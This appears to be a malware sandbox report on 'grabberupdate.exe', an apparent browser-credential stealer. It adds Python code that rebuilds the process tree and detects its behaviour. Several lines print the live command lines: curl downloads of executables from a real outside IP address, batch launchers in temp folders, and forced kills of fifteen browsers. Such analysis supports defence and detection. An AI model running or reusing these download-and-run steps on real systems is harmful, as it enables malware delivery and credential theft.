Analysis
- max time kernel: 213s
- max time network: 282s
- platform: windows11-21h2_x64
- resource: win11-20240508-en
- resource tags: arch:x64, arch:x86, image:win11-20240508-en, locale:en-us, os:windows11-21h2-x64, system
- submitted: 22-05-2024 21:27
Static task: static1
Behavioral task: behavioral1
- Sample: grabberupdate.exe
- Resource: win10v2004-20240226-en
General
- Target: grabberupdate.exe
- Size: 87KB
- MD5: ab378d6539627c52dbfc272c83eb420c
- SHA1: 039060f0fdefbe0a62147a7bbad9b1a526a78d61
- SHA256: 2a0ac2b38c51d764422f55d55a0bca58be786c10b0b1386c5dce3055894c0ef2
- SHA512: afe3be5f89ad67e2c4440d44c6ed890853eecb6cf34faed20d61ae49f30fa30a5cc390393b3ef4609a34a2121b6831cacf00ee6aa62c268e0b9fce0223bb0222
- SSDEEP: 1536:L7fPGykbOqjoHm4pICdfkLtAfupcWX50MxFY+yIOlnToIfNxFOy:Hq6+ouCpk2mpcWJ0r+QNTBfNZ
Malware Config
Signatures
- Downloads MZ/PE file
- Executes dropped EXE (2 IoCs)
  Processes (pid, process):
    3748 grabber.exe
    2800 ram.exe
- Reads user/profile data of web browsers (2 TTPs)
  Infostealers often target stored browser data, which can include saved credentials etc.
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Kills process with taskkill (15 IoCs)
  Processes (pid, process):
    1572 taskkill.exe, 3576 taskkill.exe, 4140 taskkill.exe, 4216 taskkill.exe, 3960 taskkill.exe,
    3188 taskkill.exe, 2960 taskkill.exe, 3380 taskkill.exe, 564 taskkill.exe, 4560 taskkill.exe,
    4416 taskkill.exe, 2968 taskkill.exe, 5016 taskkill.exe, 4716 taskkill.exe, 568 taskkill.exe
- Modifies registry class (1 IoC)
  Processes (description, ioc, process):
    Key created  \REGISTRY\USER\S-1-5-21-3107365284-1576850094-161165143-1000_Classes\Local Settings\MuiCache  MiniSearchHost.exe
- Suspicious use of AdjustPrivilegeToken (15 IoCs)
  Processes (description, pid, process):
    Token: SeDebugPrivilege  2968 taskkill.exe
    Token: SeDebugPrivilege  1572 taskkill.exe
    Token: SeDebugPrivilege  3576 taskkill.exe
    Token: SeDebugPrivilege  5016 taskkill.exe
    Token: SeDebugPrivilege  2960 taskkill.exe
    Token: SeDebugPrivilege  4716 taskkill.exe
    Token: SeDebugPrivilege  568 taskkill.exe
    Token: SeDebugPrivilege  4216 taskkill.exe
    Token: SeDebugPrivilege  3380 taskkill.exe
    Token: SeDebugPrivilege  564 taskkill.exe
    Token: SeDebugPrivilege  3960 taskkill.exe
    Token: SeDebugPrivilege  4560 taskkill.exe
    Token: SeDebugPrivilege  3188 taskkill.exe
    Token: SeDebugPrivilege  4416 taskkill.exe
    Token: SeDebugPrivilege  4140 taskkill.exe
- Suspicious use of SetWindowsHookEx (1 IoC)
  Processes (pid, process):
    4572 MiniSearchHost.exe
- Suspicious use of WriteProcessMemory (46 IoCs)
  Processes (source pid, source process -> target pid, target process; the sandbox records each write twice, so the 46 IoCs are 23 distinct parent/child pairs):
    1360 grabberupdate.exe -> 760 cmd.exe  (2 events)
    760 cmd.exe -> 3644 curl.exe  (2 events)
    760 cmd.exe -> 2536 curl.exe  (2 events)
    760 cmd.exe -> 3748 grabber.exe  (2 events)
    3748 grabber.exe -> 4604 cmd.exe  (2 events)
    4604 cmd.exe -> 1488 curl.exe  (2 events)
    4604 cmd.exe -> 1840 curl.exe  (2 events)
    4604 cmd.exe -> 2800 ram.exe  (2 events)
    2800 ram.exe -> 2968 taskkill.exe  (2 events)
    2800 ram.exe -> 1572 taskkill.exe  (2 events)
    2800 ram.exe -> 3576 taskkill.exe  (2 events)
    2800 ram.exe -> 5016 taskkill.exe  (2 events)
    2800 ram.exe -> 2960 taskkill.exe  (2 events)
    2800 ram.exe -> 4716 taskkill.exe  (2 events)
    2800 ram.exe -> 568 taskkill.exe  (2 events)
    2800 ram.exe -> 4216 taskkill.exe  (2 events)
    2800 ram.exe -> 3380 taskkill.exe  (2 events)
    2800 ram.exe -> 564 taskkill.exe  (2 events)
    2800 ram.exe -> 3960 taskkill.exe  (2 events)
    2800 ram.exe -> 4560 taskkill.exe  (2 events)
    2800 ram.exe -> 3188 taskkill.exe  (2 events)
    2800 ram.exe -> 4416 taskkill.exe  (2 events)
    2800 ram.exe -> 4140 taskkill.exe  (2 events)
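The WriteProcessMemory list is flattened text in the report, but every entry has the fixed shape "PID <src> wrote to memory of <dst> <src> <src image> <dst image>", so the parent/child tree can be rebuilt mechanically. The Python below is an added example, not part of the Triage report: it parses an excerpt of the list above (copied verbatim, with the sandbox's doubled entries collapsed) into a tree and renders it indented. In this sample every write lines up with a process creation shown in the Processes section (the parent writes the child's startup data), which is why the result reads as a process tree; a write from a long-lived source into a target that is not its child would instead suggest injection, and this parser does not distinguish the two.

```python
import re
from collections import defaultdict

# Excerpt copied from the "Suspicious use of WriteProcessMemory" IoCs in the report above.
# The sandbox lists every event twice; parse_events() collapses the duplicates.
REPORT_TEXT = """
PID 1360 wrote to memory of 760 1360 grabberupdate.exe cmd.exe
PID 1360 wrote to memory of 760 1360 grabberupdate.exe cmd.exe
PID 760 wrote to memory of 3644 760 cmd.exe curl.exe
PID 760 wrote to memory of 2536 760 cmd.exe curl.exe
PID 760 wrote to memory of 3748 760 cmd.exe grabber.exe
PID 3748 wrote to memory of 4604 3748 grabber.exe cmd.exe
PID 4604 wrote to memory of 1488 4604 cmd.exe curl.exe
PID 4604 wrote to memory of 1840 4604 cmd.exe curl.exe
PID 4604 wrote to memory of 2800 4604 cmd.exe ram.exe
PID 2800 wrote to memory of 2968 2800 ram.exe taskkill.exe
PID 2800 wrote to memory of 1572 2800 ram.exe taskkill.exe
"""

# "PID <src> wrote to memory of <dst> <src> <src image> <dst image>"; the back-reference
# (?P=src) rejects lines where the repeated source pid does not match.
EVENT_RE = re.compile(
    r"PID (?P<src>\d+) wrote to memory of (?P<dst>\d+) (?P=src) (?P<src_img>\S+) (?P<dst_img>\S+)"
)


def parse_events(text):
    """Return de-duplicated (src_pid, dst_pid, src_image, dst_image) tuples in report order."""
    seen = set()
    events = []
    for m in EVENT_RE.finditer(text):
        ev = (int(m["src"]), int(m["dst"]), m["src_img"], m["dst_img"])
        if ev not in seen:
            seen.add(ev)
            events.append(ev)
    return events


def build_tree(events):
    """Map pid -> image and pid -> child pids; roots are pids that were never a write target."""
    images = {}
    children = defaultdict(list)
    for src, dst, src_img, dst_img in events:
        images.setdefault(src, src_img)
        images[dst] = dst_img
        children[src].append(dst)
    targets = {dst for _, dst, _, _ in events}
    roots = [pid for pid in images if pid not in targets]
    return images, children, roots


def render(images, children, pid, depth=0):
    """Indented lines for the subtree rooted at pid (two spaces per level)."""
    lines = [f"{'  ' * depth}{pid} {images[pid]}"]
    for child in children.get(pid, []):
        lines.extend(render(images, children, child, depth + 1))
    return lines


def process_tree(text):
    """Parse the flattened IoC text and return the rendered tree as a list of lines."""
    images, children, roots = build_tree(parse_events(text))
    out = []
    for root in roots:
        out.extend(render(images, children, root))
    return out


if __name__ == "__main__":
    print("\n".join(process_tree(REPORT_TEXT)))
```

Feeding the full 46-entry list through `process_tree()` reproduces the six-level chain in the Processes section (grabberupdate.exe -> cmd.exe -> grabber.exe -> cmd.exe -> ram.exe -> taskkill.exe x15); the excerpt embedded above stops after the first two taskkill children to keep the sample short.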
Processes (bracketed number = depth in the process tree)
[1] C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe
    command line: "C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
    - Suspicious use of WriteProcessMemory
    [2] C:\Windows\system32\cmd.exe
        command line: "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"
        - Suspicious use of WriteProcessMemory
        [3] C:\Windows\system32\curl.exe
            command line: curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"
        [3] C:\Windows\system32\curl.exe
            command line: curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"
        [3] C:\Users\Admin\AppData\Local\Temp\grabber.exe
            command line: grabber.exe
            - Executes dropped EXE
            - Suspicious use of WriteProcessMemory
            [4] C:\Windows\system32\cmd.exe
                command line: "C:\Windows\system32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat C:\Users\Admin\AppData\Local\Temp\grabber.exe"
                - Suspicious use of WriteProcessMemory
                [5] C:\Windows\system32\curl.exe
                    command line: curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe
                [5] C:\Windows\system32\curl.exe
                    command line: curl -s -o rm.exe http://188.212.100.57:54391/download/winlogon.exe
                [5] C:\Users\Admin\AppData\Local\Temp\ram.exe
                    command line: ram.exe
                    - Executes dropped EXE
                    - Suspicious use of WriteProcessMemory
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM chrome.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM firefox.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM brave.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM opera.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM kometa.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM orbitum.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM centbrowser.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM 7star.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM sputnik.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM vivaldi.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM epicprivacybrowser.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM msedge.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM uran.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM yandex.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
                    [6] C:\Windows\system32\taskkill.exe
                        command line: taskkill /F /IM iridium.exe /T
                        - Kills process with taskkill
                        - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
    command line: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
    - Modifies registry class
    - Suspicious use of SetWindowsHookEx
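The tree above shows three behaviours worth turning into detections, each of which is visible in the process-creation command line alone and so does not depend on the dropped files surviving (wlms.exe and rm.exe are downloaded but appear neither in the tree nor in the Downloads list): cmd.exe /c launching a .bat unpacked into nested .tmp directories under %TEMP% and handed its own executable's path (the launcher uses C:\Windows\sysnative\cmd.exe, the WoW64 alias a 32-bit process needs to reach the 64-bit cmd.exe, which fits the arch:x86 tag), curl -s -o writing a .exe fetched from a bare IP:port with no DNS name, and one parent (ram.exe) spawning taskkill /F against fifteen browser image names in a burst. The browser kills are the usual prelude to reading Chromium profile databases, which the browser keeps locked while it runs, and they account for the "Reads user/profile data of web browsers" signature. The Python below is an added example, not part of the Triage report: it runs those three rules over constructed process-creation events in the shape of Sysmon Event ID 1 fields (command lines taken from the tree, timestamps and the benign control events made up), with a single admin taskkill and a hostname-based curl download included to show that neither rule fires on them.

```python
import re
import shlex
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address
from urllib.parse import urlparse

# Browser image names that ram.exe terminated in the report above.
BROWSERS = {
    "chrome.exe", "firefox.exe", "brave.exe", "opera.exe", "kometa.exe",
    "orbitum.exe", "centbrowser.exe", "7star.exe", "sputnik.exe", "vivaldi.exe",
    "epicprivacybrowser.exe", "msedge.exe", "uran.exe", "yandex.exe", "iridium.exe",
}

# Constructed process-creation events (Sysmon Event ID 1 style fields). Command lines follow
# the process tree above; timestamps and the pid 5000 "admin" events are made up.
EVENTS = [
    {"time": "2024-05-22T21:28:00", "pid": 760, "ppid": 1360, "image": "cmd.exe",
     "cmd": r'"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat C:\Users\Admin\AppData\Local\Temp\grabberupdate.exe"'},
    {"time": "2024-05-22T21:28:01", "pid": 3644, "ppid": 760, "image": "curl.exe",
     "cmd": 'curl -s -o grabber.exe "http://188.212.100.57:54391/download/grabber.exe"'},
    {"time": "2024-05-22T21:28:02", "pid": 2536, "ppid": 760, "image": "curl.exe",
     "cmd": 'curl -s -o wlms.exe "http://188.212.100.57:54391/download/wlms.exe"'},
    {"time": "2024-05-22T21:28:06", "pid": 1488, "ppid": 4604, "image": "curl.exe",
     "cmd": "curl -s -o ram.exe http://188.212.100.57:54391/download/shell.exe"},
    {"time": "2024-05-22T21:28:10", "pid": 2968, "ppid": 2800, "image": "taskkill.exe",
     "cmd": "taskkill /F /IM chrome.exe /T"},
    {"time": "2024-05-22T21:28:10", "pid": 1572, "ppid": 2800, "image": "taskkill.exe",
     "cmd": "taskkill /F /IM firefox.exe /T"},
    {"time": "2024-05-22T21:28:11", "pid": 3576, "ppid": 2800, "image": "taskkill.exe",
     "cmd": "taskkill /F /IM msedge.exe /T"},
    # Benign controls: an admin killing one hung browser, and curl fetching a text file by hostname.
    {"time": "2024-05-22T21:30:00", "pid": 5100, "ppid": 5000, "image": "taskkill.exe",
     "cmd": "taskkill /F /IM chrome.exe"},
    {"time": "2024-05-22T21:30:05", "pid": 5200, "ppid": 5000, "image": "curl.exe",
     "cmd": "curl -s -o notes.txt https://example.com/notes.txt"},
]

# %TEMP%\<x>.tmp\<y>.tmp\<z>.bat, the nested layout both batch files in the report use.
NESTED_TMP_BAT_RE = re.compile(r'\\Temp\\[^\\\s"]+\.tmp\\[^\\\s"]+\.tmp\\[^\\\s"]+\.bat', re.I)
TASKKILL_IM_RE = re.compile(r"/IM\s+(?P<img>\S+)", re.I)


def is_raw_ip_host(url):
    """True when the URL host is a literal IP address rather than a DNS name."""
    host = urlparse(url).hostname or ""
    try:
        ip_address(host)
        return True
    except ValueError:
        return False


def curl_exe_from_raw_ip(ev):
    """curl saving a .exe (-o) that it fetched from a bare IP address."""
    if ev["image"].lower() != "curl.exe":
        return False
    # posix=False keeps backslashes literal; quotes then stay on the token, so strip them.
    args = [a.strip('"') for a in shlex.split(ev["cmd"], posix=False)]
    try:
        out = args[args.index("-o") + 1]
    except (ValueError, IndexError):
        return False
    url = next((a for a in args if a.lower().startswith(("http://", "https://"))), None)
    return url is not None and out.lower().endswith(".exe") and is_raw_ip_host(url)


def nested_tmp_bat_launch(ev):
    """cmd.exe running a batch file from the nested .tmp directories seen in the report."""
    return ev["image"].lower() == "cmd.exe" and NESTED_TMP_BAT_RE.search(ev["cmd"]) is not None


def browser_kill_bursts(events, min_browsers=3, window=timedelta(seconds=60)):
    """Parent pids that spawned taskkill against >= min_browsers distinct browsers within window."""
    by_parent = defaultdict(list)
    for ev in events:
        if ev["image"].lower() != "taskkill.exe":
            continue
        m = TASKKILL_IM_RE.search(ev["cmd"])
        if m and m["img"].lower() in BROWSERS:
            by_parent[ev["ppid"]].append((datetime.fromisoformat(ev["time"]), m["img"].lower()))
    hits = {}
    for ppid, kills in by_parent.items():
        kills.sort()
        for i, (t0, _) in enumerate(kills):  # slide the window from each kill forward
            in_window = {img for t, img in kills[i:] if t - t0 <= window}
            if len(in_window) >= min_browsers:
                hits[ppid] = sorted(in_window)
                break
    return hits


def detect(events):
    """Return (rule, pid) findings; for the burst rule the pid is the spawning parent."""
    findings = []
    for ev in events:
        if curl_exe_from_raw_ip(ev):
            findings.append(("curl_exe_from_raw_ip", ev["pid"]))
        if nested_tmp_bat_launch(ev):
            findings.append(("nested_tmp_bat_launch", ev["pid"]))
    for ppid in browser_kill_bursts(events):
        findings.append(("browser_kill_burst", ppid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(EVENTS):
        print(f"{rule:<24} pid={pid}")
```

The burst rule keys on the parent pid and a count of distinct browser names rather than on any one image, so a user closing a single hung browser does not trip it, while the curl rule fires on the download command itself and therefore still catches wlms.exe and rm.exe even though neither file is present afterwards.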
Network
MITRE ATT&CK Matrix ATT&CK v13
Downloads
- C:\Users\Admin\AppData\Local\Temp\62F0.tmp\62F1.tmp\62F2.bat
  Filesize: 202B
  MD5: 040dc40ccd7346ace502b30584d4d5a0
  SHA1: 886b8f5f079db8f5569235aa6dff74c1cf89942d
  SHA256: f209745a8497c9b93a16dda0bf627dc88662184b00658013fec202e129f64450
  SHA512: 0319239eaebf27ff0f6c4be1b9f737da31d39faccbf47f6d0a0506d2771515928b38981d75365a0307defd530ff68b4de37d0af89519d052037782a741c7dc02
- C:\Users\Admin\AppData\Local\Temp\79F3.tmp\79F4.tmp\79F5.bat
  Filesize: 230B
  MD5: abdb6860d790577e02cca5005866bbe8
  SHA1: 6c87a9e8b0b29ffe358c079a54f06dd9ef5cfb37
  SHA256: ee13e97e15c3a2f432a7bfd3af278aa38ff88baa7652ea0bfb2e5d9bf5adb8f0
  SHA512: 1bbcf1d4540019aa392234e91e7629fd9f61240b8d7003df3404536810e639f7019a60bb74c2a08be5f855fd96923d0f8e0cdf7fa3a3d25e1e5829487a959fce
- C:\Users\Admin\AppData\Local\Temp\cards.json
  Filesize: 4B (the hashes below are those of the literal text null, i.e. an empty JSON value)
  MD5: 37a6259cc0c1dae299a7866489dff0bd
  SHA1: 2be88ca4242c76e8253ac62474851065032d6833
  SHA256: 74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b
  SHA512: 04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f
- C:\Users\Admin\AppData\Local\Temp\grabber.exe
  Filesize: 120KB
  MD5: 4e1e436848d533c9a00b762ac148786d
  SHA1: 42962a264fbdbc96eb8267052298be9143ecd8bf
  SHA256: efcd31afd704c03d8a487a06c795bba7ea0a1cde0866d8fcfd40f4c3ce197bbd
  SHA512: 59d16efac5f0ea7c62d18ef30032eba907b8d6c097463a8244f3d709c85b90ec12387c94a4d8a35dfb59d0cbd2dc02d0b39a1f6bd12c5ccd050d552070fdf30d
- C:\Users\Admin\AppData\Local\Temp\ram.exe
  Filesize: 7.6MB
  MD5: 2c93399e0b0fc11cd03a56fc844a4816
  SHA1: d8a6db37b1ac3cc819b04b0f4aac7fe721f88f00
  SHA256: 081da8d5b9e21e11ae3aeafd4ac54ba2e7a45a05abb08139bc1aa0213f1ef155
  SHA512: dea99c0a22077389f6f6662e644e47ecb55ac010881b135ada2e07ac7a5ba1d42670d52c6cd88804aa3a16783f1e1f39b23fe3f7de6030ede831a27fee30f4a8
- memory/2800-20-0x00007FF7746C0000-0x00007FF774EF3000-memory.dmp (memory dump of pid 2800, ram.exe)
  Filesize: 8.2MB